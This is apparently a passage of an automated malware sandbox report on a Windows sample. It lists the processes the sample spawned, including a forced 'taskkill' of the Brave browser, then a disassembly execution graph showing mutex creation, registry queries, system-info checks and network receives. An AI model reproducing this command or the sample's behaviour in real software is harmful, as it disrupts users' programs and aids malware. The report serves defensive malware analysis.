                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:taskkill /F /IM brave.exe /T
                                                                                                                                                                                                                                                              Imagebase:0x460000
                                                                                                                                                                                                                                                              File size:74'240 bytes
                                                                                                                                                                                                                                                              MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Target ID:46
                                                                                                                                                                                                                                                              Start time:17:10:00
                                                                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:2.4%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                Signature Coverage:2.8%
                                                                                                                                                                                                                                                                Total number of Nodes:755
                                                                                                                                                                                                                                                                Total number of Limit Nodes:16
                                                                                                                                                                                                                                                                execution_graph 14429 9e3f9f 14430 9e3fad 14429->14430 14432 9e3fb6 14429->14432 14431 9e2410 5 API calls 14430->14431 14431->14432 14399 9e9adc 14402 9e9aea shared_ptr 14399->14402 14400 9ea917 14401 9ea953 Sleep CreateMutexA 14400->14401 14403 9ea98e 14401->14403 14402->14400 14404 9e9b4b shared_ptr 14402->14404 14405 9e9b59 14404->14405 14406 9e5c10 6 API calls 14404->14406 14407 9e9b7c 14406->14407 14408 9e8b30 6 API calls 14407->14408 14409 9e9b8d 14408->14409 14410 9e5c10 6 API calls 14409->14410 14411 9e9cb1 14410->14411 14412 9e8b30 6 API calls 14411->14412 14413 9e9cc2 14412->14413 14330 9e215a 14333 9fc6fc 14330->14333 14332 9e2164 14334 9fc70c 14333->14334 14335 9fc724 14333->14335 14334->14335 14337 9fcfbe 14334->14337 14335->14332 14338 9fccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 14337->14338 14339 9fcfd0 14338->14339 14339->14334 13798 9ea856 13799 9ea870 13798->13799 13800 9ea892 shared_ptr 13798->13800 13799->13800 13802 9ea94e 13799->13802 13804 9ea8a0 13800->13804 13814 9e7d30 13800->13814 13805 9ea953 Sleep CreateMutexA 13802->13805 13803 9ea8ae 13803->13804 13806 9e7d30 7 API calls 13803->13806 13809 9ea98e 13805->13809 13807 9ea8b8 13806->13807 13807->13804 13808 9e7d30 7 API calls 13807->13808 13810 9ea8c2 13808->13810 13810->13804 13811 9e7d30 7 API calls 13810->13811 13812 9ea8cc 13811->13812 13812->13804 13813 9e7d30 7 API calls 13812->13813 13813->13804 13815 9e7d96 __cftof 13814->13815 13821 9e7ee8 shared_ptr std::future_error::future_error 13815->13821 13853 9e5c10 13815->13853 13817 9e7dd2 13818 9e5c10 6 API calls 13817->13818 13820 9e7dff shared_ptr 13818->13820 13819 9e7ed3 GetNativeSystemInfo 13822 9e7ed7 13819->13822 13820->13819 13820->13821 13820->13822 13821->13803 13822->13821 13823 9e7f3f 13822->13823 13824 9e8019 13822->13824 13825 9e5c10 6 API calls 13823->13825 13826 9e5c10 6 API calls 13824->13826 13827 9e7f67 13825->13827 13828 9e804c 13826->13828 13830 9e5c10 6 API calls 13827->13830 13829 9e5c10 6 API calls 13828->13829 13832 9e806b 13829->13832 13831 9e7f86 13830->13831 13863 a18bbe 13831->13863 13834 9e5c10 6 API calls 13832->13834 13835 9e80a3 13834->13835 13836 9e5c10 6 API calls 13835->13836 13837 9e80f4 13836->13837 13838 9e5c10 6 API calls 13837->13838 13839 9e8113 13838->13839 13840 9e5c10 6 API calls 13839->13840 13841 9e814b 13840->13841 13842 9e5c10 6 API calls 13841->13842 13843 9e819c 13842->13843 13844 9e5c10 6 API calls 13843->13844 13845 9e81bb 13844->13845 13846 9e5c10 6 API calls 13845->13846 13847 9e81f3 13846->13847 13848 9e5c10 6 API calls 13847->13848 13849 9e8244 13848->13849 13850 9e5c10 6 API calls 13849->13850 13851 9e8263 13850->13851 13852 9e5c10 6 API calls 13851->13852 13852->13821 13854 9e5c54 13853->13854 13866 9e4b30 13854->13866 13856 9e5d17 shared_ptr std::future_error::future_error 13856->13817 13857 9e5c7b __cftof 13857->13856 13858 9e5da7 RegOpenKeyExA 13857->13858 13859 9e5e00 RegCloseKey 13858->13859 13861 9e5e26 13859->13861 13860 9e5ea6 shared_ptr std::future_error::future_error 13860->13817 13861->13860 13862 9e5c10 4 API calls 13861->13862 13992 a18868 13863->13992 13865 a18bdc 13865->13821 13868 9e4ce5 13866->13868 13869 9e4b92 13866->13869 13868->13857 13869->13868 13870 a16da6 13869->13870 13871 a16dc2 __fassign 13870->13871 13872 a16db4 13870->13872 13871->13869 13875 a16d19 13872->13875 13880 a1690a 13875->13880 13879 a16d3d 13879->13869 13881 a16921 13880->13881 13882 a1692a 13880->13882 13888 a16d52 13881->13888 13882->13881 13894 a1a671 13882->13894 13889 a16d8f 13888->13889 13890 a16d5f 13888->13890 13984 a1b67d 13889->13984 13893 a16d6e __fassign 13890->13893 13979 a1b6a1 13890->13979 13893->13879 13895 a1a67b __cftof 13894->13895 13897 a1a694 __cftof ___free_lconv_mon 13895->13897 13909 a1d82f 13895->13909 13898 a1694a 13897->13898 13913 a18bec 13897->13913 13901 a1b5fb 13898->13901 13902 a1b60e 13901->13902 13904 a16960 13901->13904 13902->13904 13944 a1f5ab 13902->13944 13905 a1b628 13904->13905 13906 a1b63b 13905->13906 13908 a1b650 13905->13908 13906->13908 13951 a1e6b1 13906->13951 13908->13881 13912 a1d83c __cftof 13909->13912 13910 a1d867 RtlAllocateHeap 13911 a1d87a 13910->13911 13910->13912 13911->13897 13912->13910 13912->13911 13914 a18bf1 __cftof 13913->13914 13918 a18bfc __cftof 13914->13918 13919 a1d634 13914->13919 13933 a165ed 13918->13933 13920 a1d640 __cftof 13919->13920 13921 a1d69c __cftof 13920->13921 13922 a1d726 13920->13922 13923 a1d81b __cftof 13920->13923 13924 a1d751 __cftof 13920->13924 13921->13918 13922->13924 13936 a1d62b 13922->13936 13925 a165ed __cftof 3 API calls 13923->13925 13924->13921 13928 a1a671 __cftof 4 API calls 13924->13928 13931 a1d7a5 13924->13931 13927 a1d82e 13925->13927 13928->13931 13930 a1d62b __cftof 4 API calls 13930->13924 13931->13921 13932 a1a671 __cftof 4 API calls 13931->13932 13932->13921 13939 a164c7 13933->13939 13937 a1a671 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 13936->13937 13938 a1d630 13937->13938 13938->13930 13940 a164d5 __cftof 13939->13940 13941 a16520 13940->13941 13942 a1652b __cftof GetPEB ExitProcess GetPEB 13940->13942 13943 a1652a 13942->13943 13945 a1f5b7 __cftof 13944->13945 13946 a1a671 __cftof 4 API calls 13945->13946 13948 a1f5c0 __cftof 13946->13948 13947 a1f606 13947->13904 13948->13947 13949 a18bec __cftof 4 API calls 13948->13949 13950 a1f62b 13949->13950 13952 a1a671 __cftof 4 API calls 13951->13952 13953 a1e6bb 13952->13953 13956 a1e5c9 13953->13956 13955 a1e6c1 13955->13908 13959 a1e5d5 __cftof ___free_lconv_mon 13956->13959 13957 a1e5f6 13957->13955 13958 a18bec __cftof 4 API calls 13960 a1e668 13958->13960 13959->13957 13959->13958 13961 a1e6a4 13960->13961 13965 a1a72e 13960->13965 13961->13955 13966 a1a739 __cftof 13965->13966 13967 a1d82f __cftof RtlAllocateHeap 13966->13967 13971 a1a745 __cftof ___free_lconv_mon 13966->13971 13967->13971 13968 a18bec __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 13969 a1a7c7 13968->13969 13970 a1a7be 13972 a1e4b0 13970->13972 13971->13968 13971->13970 13973 a1e5c9 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 13972->13973 13974 a1e4c3 13973->13974 13975 a1e259 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 13974->13975 13976 a1e4cb __cftof 13975->13976 13977 a1e6c4 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 13976->13977 13978 a1e4dc __cftof ___free_lconv_mon 13976->13978 13977->13978 13978->13961 13980 a1690a __cftof 4 API calls 13979->13980 13982 a1b6be 13980->13982 13981 a1b6ce std::future_error::future_error 13981->13893 13982->13981 13989 a1f1bf 13982->13989 13985 a1a671 __cftof 4 API calls 13984->13985 13986 a1b688 13985->13986 13987 a1b5fb __cftof 4 API calls 13986->13987 13988 a1b698 13987->13988 13988->13893 13990 a1690a __cftof 4 API calls 13989->13990 13991 a1f1df __cftof __fassign __freea std::future_error::future_error 13990->13991 13991->13981 13993 a1887a 13992->13993 13994 a1690a __cftof 4 API calls 13993->13994 13995 a1888f __cftof 13993->13995 13997 a188bf 13994->13997 13995->13865 13996 a16d52 4 API calls 13996->13997 13997->13995 13997->13996 13998 a16629 13999 a164c7 __cftof 3 API calls 13998->13999 14000 a1663a 13999->14000 14275 9fd111 14277 9fd121 14275->14277 14278 9fd12a 14277->14278 14279 9fd199 14277->14279 14280 9fd1a7 SleepConditionVariableCS 14279->14280 14282 9fd1c0 14279->14282 14280->14282 14282->14277 14433 9e2b90 14434 9e2bce 14433->14434 14435 9fb7fb TpReleaseWork 14434->14435 14436 9e2bdb shared_ptr std::future_error::future_error 14435->14436 14629 9e2b10 14630 9e2b1c 14629->14630 14631 9e2b1a 14629->14631 14632 9fc26a 5 API calls 14630->14632 14633 9e2b22 14632->14633 14513 9f87d0 14514 9f882a __cftof 14513->14514 14520 9f9bb0 14514->14520 14518 9f88d9 std::_Throw_future_error 14519 9f886c std::future_error::future_error 14533 9f9ef0 14520->14533 14522 9f9be5 14537 9e2ce0 14522->14537 14524 9f9c16 14546 9f9f70 14524->14546 14526 9f8854 14526->14519 14527 9e43f0 14526->14527 14528 9fbedf InitOnceExecuteOnce 14527->14528 14529 9e440a 14528->14529 14530 9e4411 14529->14530 14531 a16cbb 4 API calls 14529->14531 14530->14518 14532 9e4424 14531->14532 14534 9f9f0c 14533->14534 14535 9fc68b __Mtx_init_in_situ 2 API calls 14534->14535 14536 9f9f17 14535->14536 14536->14522 14538 9e2d1d 14537->14538 14539 9fbedf InitOnceExecuteOnce 14538->14539 14540 9e2d46 14539->14540 14541 9e2d51 std::future_error::future_error 14540->14541 14542 9e2d88 14540->14542 14551 9fbef7 14540->14551 14541->14524 14544 9e2440 4 API calls 14542->14544 14545 9e2d9b 14544->14545 14545->14524 14547 9f9fef shared_ptr 14546->14547 14549 9fa058 14547->14549 14564 9fa210 14547->14564 14550 9fa03b 14550->14526 14552 9fbf03 Concurrency::cancel_current_task 14551->14552 14553 9fbf6a 14552->14553 14554 9fbf73 14552->14554 14558 9fbe7f 14553->14558 14555 9e2ae0 5 API calls 14554->14555 14557 9fbf6f 14555->14557 14557->14542 14559 9fcc31 InitOnceExecuteOnce 14558->14559 14560 9fbe97 14559->14560 14561 9fbe9e 14560->14561 14562 a16cbb 4 API calls 14560->14562 14561->14557 14563 9fbea7 14562->14563 14563->14557 14565 9fa290 14564->14565 14571 9f71d0 14565->14571 14567 9fa4be shared_ptr 14567->14550 14568 9fa2cc shared_ptr 14568->14567 14569 9e3ee0 3 API calls 14568->14569 14570 9fa4a6 14569->14570 14570->14550 14572 9f7211 14571->14572 14579 9e3970 14572->14579 14574 9f7446 std::future_error::future_error 14574->14568 14575 9f72ad __cftof 14575->14574 14576 9fc68b __Mtx_init_in_situ 2 API calls 14575->14576 14577 9f7401 14576->14577 14584 9e2ec0 14577->14584 14580 9fc68b __Mtx_init_in_situ 2 API calls 14579->14580 14581 9e39a7 14580->14581 14582 9fc68b __Mtx_init_in_situ 2 API calls 14581->14582 14583 9e39e6 14582->14583 14583->14575 14585 9e2f06 14584->14585 14589 9e2f6f 14584->14589 14586 9fc6ac GetSystemTimePreciseAsFileTime 14585->14586 14587 9e2f12 14586->14587 14590 9e301e 14587->14590 14593 9e2f1d __Mtx_unlock 14587->14593 14588 9e2fef 14588->14574 14589->14588 14595 9fc6ac GetSystemTimePreciseAsFileTime 14589->14595 14591 9fc26a 5 API calls 14590->14591 14592 9e3024 14591->14592 14594 9fc26a 5 API calls 14592->14594 14593->14589 14593->14592 14596 9e2fb9 14594->14596 14595->14596 14597 9fc26a 5 API calls 14596->14597 14598 9e2fc0 __Mtx_unlock 14596->14598 14597->14598 14599 9fc26a 5 API calls 14598->14599 14600 9e2fd8 14598->14600 14599->14600 14600->14588 14601 9fc26a 5 API calls 14600->14601 14602 9e303c 14601->14602 14603 9fc6ac GetSystemTimePreciseAsFileTime 14602->14603 14612 9e3080 shared_ptr __Mtx_unlock 14603->14612 14604 9fc26a 5 API calls 14605 9e31cb 14604->14605 14606 9fc26a 5 API calls 14605->14606 14607 9e31d1 14606->14607 14608 9fc26a 5 API calls 14607->14608 14614 9e3193 __Mtx_unlock 14608->14614 14609 9e31a7 std::future_error::future_error 14609->14574 14610 9fc26a 5 API calls 14611 9e31dd 14610->14611 14612->14605 14612->14609 14613 9fc6ac GetSystemTimePreciseAsFileTime 14612->14613 14615 9e315f 14612->14615 14613->14615 14614->14609 14614->14610 14615->14604 14615->14607 14615->14614 14064 9e3c8e 14065 9e3c98 14064->14065 14067 9e3ca5 14065->14067 14072 9e2410 14065->14072 14068 9e3ccf 14067->14068 14076 9e3810 14067->14076 14070 9e3810 4 API calls 14068->14070 14071 9e3cdb 14070->14071 14073 9e2424 14072->14073 14080 9fb52d 14073->14080 14077 9e381c 14076->14077 14129 9e2440 14077->14129 14088 a13aed 14080->14088 14082 9e242a 14082->14067 14083 9fb5a5 ___std_exception_copy 14095 9fb1ad 14083->14095 14084 9fb598 14091 9faf56 14084->14091 14099 a14f29 14088->14099 14090 9fb555 14090->14082 14090->14083 14090->14084 14092 9faf9f ___std_exception_copy 14091->14092 14094 9fafb2 shared_ptr 14092->14094 14105 9fb39f 14092->14105 14094->14082 14096 9fb1d8 14095->14096 14098 9fb1e1 shared_ptr 14095->14098 14097 9fb39f 5 API calls 14096->14097 14097->14098 14098->14082 14100 a14f2e __cftof 14099->14100 14100->14090 14101 a1d634 __cftof 4 API calls 14100->14101 14104 a18bfc __cftof 14100->14104 14101->14104 14102 a165ed __cftof 3 API calls 14103 a18c2f 14102->14103 14104->14102 14116 9fbedf 14105->14116 14108 9fb3e8 14108->14094 14125 9fcc31 14116->14125 14119 a16cbb 14120 a16cc7 __cftof 14119->14120 14121 a1a671 __cftof 4 API calls 14120->14121 14122 a16ccc 14121->14122 14123 a18bec __cftof 4 API calls 14122->14123 14124 a16cf6 14123->14124 14126 9fcc3f InitOnceExecuteOnce 14125->14126 14128 9fb3e1 14125->14128 14126->14128 14128->14108 14128->14119 14132 9fb5d6 14129->14132 14131 9e2472 14134 9fb5f1 Concurrency::cancel_current_task 14132->14134 14133 a18bec __cftof 4 API calls 14135 9fb69f 14133->14135 14134->14133 14136 9fb658 __cftof std::future_error::future_error 14134->14136 14136->14131 14158 9fd0c7 14160 9fd0d7 14158->14160 14159 9fd17f 14160->14159 14161 9fd17b RtlWakeAllConditionVariable 14160->14161 14218 9e3c47 14219 9e3c51 14218->14219 14222 9e3c5f 14219->14222 14225 9e32d0 14219->14225 14221 9e3c68 14222->14221 14223 9e3810 4 API calls 14222->14223 14224 9e3cdb 14223->14224 14226 9fc6ac GetSystemTimePreciseAsFileTime 14225->14226 14229 9e3314 14226->14229 14227 9fc26a 5 API calls 14228 9e333c __Mtx_unlock 14227->14228 14230 9fc26a 5 API calls 14228->14230 14232 9e3350 std::future_error::future_error 14228->14232 14229->14227 14229->14228 14231 9e3377 14230->14231 14233 9fc6ac GetSystemTimePreciseAsFileTime 14231->14233 14232->14222 14234 9e33af 14233->14234 14235 9fc26a 5 API calls 14234->14235 14236 9e33b6 14234->14236 14235->14236 14237 9fc26a 5 API calls 14236->14237 14239 9e33d7 __Mtx_unlock 14236->14239 14237->14239 14238 9fc26a 5 API calls 14241 9e340e 14238->14241 14239->14238 14240 9e33eb 14239->14240 14240->14222 14241->14222 14770 9e9f44 14771 9e9f4c shared_ptr 14770->14771 14772 9ea953 Sleep CreateMutexA 14771->14772 14773 9ea01f shared_ptr 14771->14773 14774 9ea98e 14772->14774 14009 9e8780 14010 9e8786 14009->14010 14016 a16729 14010->14016 14013 9e87a6 14015 9e87a0 14023 a16672 14016->14023 14018 9e8793 14018->14013 14019 a167b7 14018->14019 14021 a167c3 __cftof 14019->14021 14020 a167cd __cftof 14020->14015 14021->14020 14035 a16740 14021->14035 14024 a1667e __cftof 14023->14024 14025 a16685 __cftof 14024->14025 14027 a1a8c3 14024->14027 14025->14018 14028 a1a8cf __cftof 14027->14028 14031 a1a967 14028->14031 14030 a1a8ea 14030->14025 14033 a1a98a 14031->14033 14032 a1d82f __cftof RtlAllocateHeap 14034 a1a9d0 ___free_lconv_mon 14032->14034 14033->14032 14033->14034 14034->14030 14036 a16762 14035->14036 14038 a1674d __cftof ___free_lconv_mon 14035->14038 14036->14038 14039 a1a038 14036->14039 14038->14020 14040 a1a050 14039->14040 14042 a1a075 14039->14042 14040->14042 14043 a20439 14040->14043 14042->14038 14044 a20445 __cftof 14043->14044 14046 a2044d __cftof __dosmaperr 14044->14046 14047 a2052b 14044->14047 14046->14042 14049 a2054d 14047->14049 14052 a20551 __cftof __dosmaperr 14047->14052 14049->14052 14053 a200d2 14049->14053 14052->14046 14054 a200e3 14053->14054 14055 a1a671 __cftof 4 API calls 14054->14055 14056 a20106 14054->14056 14055->14056 14056->14052 14057 a1fcc0 14056->14057 14058 a1fd0d 14057->14058 14059 a1690a __cftof 4 API calls 14058->14059 14062 a1fd1c __cftof 14059->14062 14060 a1b67d 4 API calls 14060->14062 14061 a1ffbc std::future_error::future_error 14061->14052 14062->14060 14062->14061 14063 a1c719 GetPEB ExitProcess GetPEB RtlAllocateHeap __fassign 14062->14063 14063->14062 14162 9e20c0 14163 9fc68b __Mtx_init_in_situ 2 API calls 14162->14163 14164 9e20cc 14163->14164 14165 9ee0c0 recv 14166 9ee122 recv 14165->14166 14167 9ee157 recv 14166->14167 14168 9ee191 14167->14168 14169 9ee2b3 std::future_error::future_error 14168->14169 14174 9fc6ac 14168->14174 14181 9fc452 14174->14181 14176 9ee2ee 14177 9fc26a 14176->14177 14178 9fc292 14177->14178 14179 9fc274 14177->14179 14178->14178 14179->14178 14198 9fc297 14179->14198 14182 9fc4a8 14181->14182 14184 9fc47a std::future_error::future_error 14181->14184 14182->14184 14187 9fcf6b 14182->14187 14184->14176 14185 9fc4fd __Xtime_diff_to_millis2 14185->14184 14186 9fcf6b _xtime_get GetSystemTimePreciseAsFileTime 14185->14186 14186->14185 14188 9fcf7a 14187->14188 14190 9fcf87 __aulldvrm 14187->14190 14188->14190 14191 9fcf44 14188->14191 14190->14185 14194 9fcbea 14191->14194 14195 9fcbfb GetSystemTimePreciseAsFileTime 14194->14195 14196 9fcc07 14194->14196 14195->14196 14196->14190 14201 9e2ae0 14198->14201 14200 9fc2ae Concurrency::cancel_current_task 14202 9fbedf InitOnceExecuteOnce 14201->14202 14204 9e2af4 __cftof 14202->14204 14203 9e2aff 14203->14200 14204->14203 14205 a1a671 __cftof 4 API calls 14204->14205 14206 a16ccc 14205->14206 14207 a18bec __cftof 4 API calls 14206->14207 14208 a16cf6 14207->14208 14247 9e8980 14249 9e8aea 14247->14249 14250 9e89d8 shared_ptr 14247->14250 14248 9e5c10 6 API calls 14248->14250 14250->14248 14250->14249 14414 9e2e00 14415 9e2e28 14414->14415 14416 9fc68b __Mtx_init_in_situ 2 API calls 14415->14416 14417 9e2e33 14416->14417 14418 a16a44 14419 a16a52 14418->14419 14420 a16a5c 14418->14420 14423 a1698d 14420->14423 14422 a16a76 ___free_lconv_mon 14424 a1690a __cftof 4 API calls 14423->14424 14425 a1699f 14424->14425 14425->14422 14361 9e9ab8 14363 9e9acc 14361->14363 14364 9e9b08 14363->14364 14365 9ea917 14364->14365 14367 9e9b4b shared_ptr 14364->14367 14366 9ea953 Sleep CreateMutexA 14365->14366 14370 9ea98e 14366->14370 14368 9e9b59 14367->14368 14369 9e5c10 6 API calls 14367->14369 14371 9e9b7c 14369->14371 14378 9e8b30 14371->14378 14373 9e9b8d 14374 9e5c10 6 API calls 14373->14374 14375 9e9cb1 14374->14375 14376 9e8b30 6 API calls 14375->14376 14377 9e9cc2 14376->14377 14379 9e8b7c 14378->14379 14380 9e5c10 6 API calls 14379->14380 14381 9e8b97 shared_ptr std::future_error::future_error 14380->14381 14381->14373 14426 9e4276 14427 9e2410 5 API calls 14426->14427 14428 9e427f 14427->14428 14256 9ea9f4 14265 9e9230 14256->14265 14258 9eaa03 shared_ptr 14259 9e5c10 6 API calls 14258->14259 14264 9eaab3 shared_ptr std::future_error::future_error 14258->14264 14260 9eaa65 14259->14260 14261 9e5c10 6 API calls 14260->14261 14262 9eaa8d 14261->14262 14263 9e5c10 6 API calls 14262->14263 14263->14264 14268 9e9284 shared_ptr 14265->14268 14266 9e5c10 6 API calls 14266->14268 14267 9e9543 shared_ptr std::future_error::future_error 14267->14258 14268->14266 14273 9e944f shared_ptr 14268->14273 14269 9e5c10 6 API calls 14269->14273 14270 9e98b5 shared_ptr std::future_error::future_error 14270->14258 14271 9e979f shared_ptr 14271->14270 14272 9e5c10 6 API calls 14271->14272 14274 9e9927 shared_ptr std::future_error::future_error 14272->14274 14273->14267 14273->14269 14273->14271 14274->14258 14001 9e87b2 14002 9e87b8 GetFileAttributesA 14001->14002 14003 9e87b6 14001->14003 14004 9e87c4 14002->14004 14003->14002 14286 9e8d30 14287 9e8d7f 14286->14287 14288 9e5c10 6 API calls 14287->14288 14289 9e8d9a shared_ptr std::future_error::future_error 14288->14289 14345 9e2170 14346 9fc6fc InitializeCriticalSectionEx 14345->14346 14347 9e217a 14346->14347 14348 9ead70 14349 9eaec0 shared_ptr std::future_error::future_error 14348->14349 14351 9eaddc shared_ptr 14348->14351 14351->14349 14352 a18ab6 14351->14352 14353 a18ad1 14352->14353 14354 a18868 4 API calls 14353->14354 14355 a18adb 14354->14355 14355->14351 14382 9e42b0 14385 9e3ac0 14382->14385 14384 9e42bb shared_ptr 14386 9e3af9 14385->14386 14387 9e32d0 6 API calls 14386->14387 14389 9e3c38 14386->14389 14391 9e3b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 14386->14391 14387->14389 14388 9e32d0 6 API calls 14392 9e3c5f 14388->14392 14389->14388 14389->14392 14390 9e3c68 14390->14384 14391->14384 14392->14390 14393 9e3810 4 API calls 14392->14393 14394 9e3cdb 14393->14394 14437 9e77b0 14438 9e77f1 shared_ptr 14437->14438 14439 9e5c10 6 API calls 14438->14439 14441 9e7883 shared_ptr 14438->14441 14439->14441 14440 9e5c10 6 API calls 14443 9e79e3 14440->14443 14441->14440 14442 9e7953 shared_ptr std::future_error::future_error 14441->14442 14444 9e5c10 6 API calls 14443->14444 14445 9e7a15 shared_ptr 14444->14445 14446 9e5c10 6 API calls 14445->14446 14451 9e7aa5 shared_ptr std::future_error::future_error 14445->14451 14447 9e7b7d 14446->14447 14448 9e5c10 6 API calls 14447->14448 14449 9e7ba0 14448->14449 14450 9e5c10 6 API calls 14449->14450 14450->14451 14452 9e87b0 14453 9e87b8 GetFileAttributesA 14452->14453 14454 9e87b6 14452->14454 14455 9e87c4 14453->14455 14454->14453 14456 9f47b0 14458 9f4eed 14456->14458 14457 9f4f59 shared_ptr std::future_error::future_error 14458->14457 14459 9e7d30 7 API calls 14458->14459 14460 9f50ed 14459->14460 14495 9e8380 14460->14495 14462 9f5106 14463 9e5c10 6 API calls 14462->14463 14464 9f5155 14463->14464 14465 9e5c10 6 API calls 14464->14465 14466 9f5171 14465->14466 14501 9e9a00 14466->14501 14496 9e83e5 __cftof 14495->14496 14497 9e5c10 6 API calls 14496->14497 14500 9e8403 shared_ptr std::future_error::future_error 14496->14500 14498 9e8427 14497->14498 14499 9e5c10 6 API calls 14498->14499 14499->14500 14500->14462 14502 9e9a3f 14501->14502 14503 9e5c10 6 API calls 14502->14503 14504 9e9a47 14503->14504 14505 9e8b30 6 API calls 14504->14505 14506 9e9a58 14505->14506 14507 9e9ba5 14508 9e9ba7 14507->14508 14509 9e5c10 6 API calls 14508->14509 14510 9e9cb1 14509->14510 14511 9e8b30 6 API calls 14510->14511 14512 9e9cc2 14511->14512 14005 9eb1a0 14006 9eb1f2 14005->14006 14007 9eb3ad CoInitialize 14006->14007 14008 9eb3fa shared_ptr std::future_error::future_error 14007->14008 14137 9e20a0 14140 9fc68b 14137->14140 14139 9e20ac 14143 9fc3d5 14140->14143 14142 9fc69b 14142->14139 14144 9fc3eb 14143->14144 14145 9fc3e1 14143->14145 14144->14142 14146 9fc3be 14145->14146 14147 9fc39e 14145->14147 14156 9fcd0a 14146->14156 14147->14144 14152 9fccd5 14147->14152 14150 9fc3d0 14150->14142 14153 9fc3b7 14152->14153 14154 9fcce3 InitializeCriticalSectionEx 14152->14154 14153->14142 14154->14153 14157 9fcd1f RtlInitializeConditionVariable 14156->14157 14157->14150 14290 9e4120 14291 9e416a 14290->14291 14293 9e41b2 std::future_error::future_error 14291->14293 14294 9e3ee0 14291->14294 14295 9e3f1e 14294->14295 14296 9e3f48 14294->14296 14295->14293 14297 9e3f58 14296->14297 14300 9e2c00 14296->14300 14297->14293 14301 9e2c0e 14300->14301 14307 9fb847 14301->14307 14303 9e2c42 14304 9e2c49 14303->14304 14313 9e2c80 14303->14313 14304->14293 14306 9e2c58 Concurrency::cancel_current_task 14308 9fb854 14307->14308 14312 9fb873 Concurrency::details::_Reschedule_chore 14307->14312 14316 9fcb77 14308->14316 14310 9fb864 14310->14312 14318 9fb81e 14310->14318 14312->14303 14324 9fb7fb 14313->14324 14315 9e2cb2 shared_ptr 14315->14306 14317 9fcb92 CreateThreadpoolWork 14316->14317 14317->14310 14320 9fb827 Concurrency::details::_Reschedule_chore 14318->14320 14322 9fcdcc 14320->14322 14321 9fb841 14321->14312 14323 9fcde1 TpPostWork 14322->14323 14323->14321 14325 9fb817 14324->14325 14326 9fb807 14324->14326 14325->14315 14326->14325 14328 9fca78 14326->14328 14329 9fca8d TpReleaseWork 14328->14329 14329->14325 14616 9e3fe0 14618 9e4022 14616->14618 14617 9e4035 std::future_error::future_error 14618->14617 14619 9e408c 14618->14619 14620 9e40d2 14618->14620 14623 9e35e0 14619->14623 14621 9e3ee0 3 API calls 14620->14621 14621->14617 14624 9e3616 14623->14624 14625 9e2ce0 5 API calls 14624->14625 14628 9e364e Concurrency::cancel_current_task shared_ptr std::future_error::future_error 14624->14628 14626 9e369e 14625->14626 14627 9e2c00 3 API calls 14626->14627 14626->14628 14627->14628 14628->14617 14634 9eaf20 14635 9eaf63 14634->14635 14646 a16660 14635->14646 14640 a1663f 4 API calls 14641 9eaf80 14640->14641 14642 a1663f 4 API calls 14641->14642 14643 9eaf98 __cftof 14642->14643 14652 9e55f0 14643->14652 14645 9eb04e shared_ptr std::future_error::future_error 14647 a1a671 __cftof 4 API calls 14646->14647 14648 9eaf69 14647->14648 14649 a1663f 14648->14649 14650 a1a671 __cftof 4 API calls 14649->14650 14651 9eaf71 14650->14651 14651->14640 14653 9e5610 14652->14653 14655 9e5710 std::future_error::future_error 14653->14655 14656 9e22c0 14653->14656 14655->14645 14659 9e2280 14656->14659 14660 9e2296 14659->14660 14663 a187f8 14660->14663 14666 a17609 14663->14666 14665 9e22a4 14665->14653 14667 a17649 14666->14667 14671 a17631 __cftof std::future_error::future_error 14666->14671 14668 a1690a __cftof 4 API calls 14667->14668 14667->14671 14669 a17661 14668->14669 14672 a17bc4 14669->14672 14671->14665 14674 a17bd5 14672->14674 14673 a17be4 __cftof 14673->14671 14674->14673 14679 a18168 14674->14679 14684 a17dc2 14674->14684 14689 a17de8 14674->14689 14699 a17f36 14674->14699 14680 a18171 14679->14680 14681 a18178 14679->14681 14708 a17b50 14680->14708 14681->14674 14683 a18177 14683->14674 14685 a17dd2 14684->14685 14686 a17dcb 14684->14686 14685->14674 14687 a17b50 4 API calls 14686->14687 14688 a17dd1 14687->14688 14688->14674 14690 a17e09 __cftof 14689->14690 14694 a17def 14689->14694 14690->14674 14691 a17f69 14696 a17f77 14691->14696 14698 a17f8b 14691->14698 14716 a18241 14691->14716 14693 a17fa2 14693->14698 14712 a18390 14693->14712 14694->14690 14694->14691 14694->14693 14694->14696 14696->14698 14720 a186ea 14696->14720 14698->14674 14700 a17f69 14699->14700 14701 a17f4f 14699->14701 14702 a18241 4 API calls 14700->14702 14706 a17f77 14700->14706 14707 a17f8b 14700->14707 14701->14700 14703 a17fa2 14701->14703 14701->14706 14702->14706 14704 a18390 4 API calls 14703->14704 14703->14707 14704->14706 14705 a186ea 4 API calls 14705->14707 14706->14705 14706->14707 14707->14674 14709 a17b62 14708->14709 14710 a18ab6 4 API calls 14709->14710 14711 a17b85 14710->14711 14711->14683 14714 a183ab 14712->14714 14713 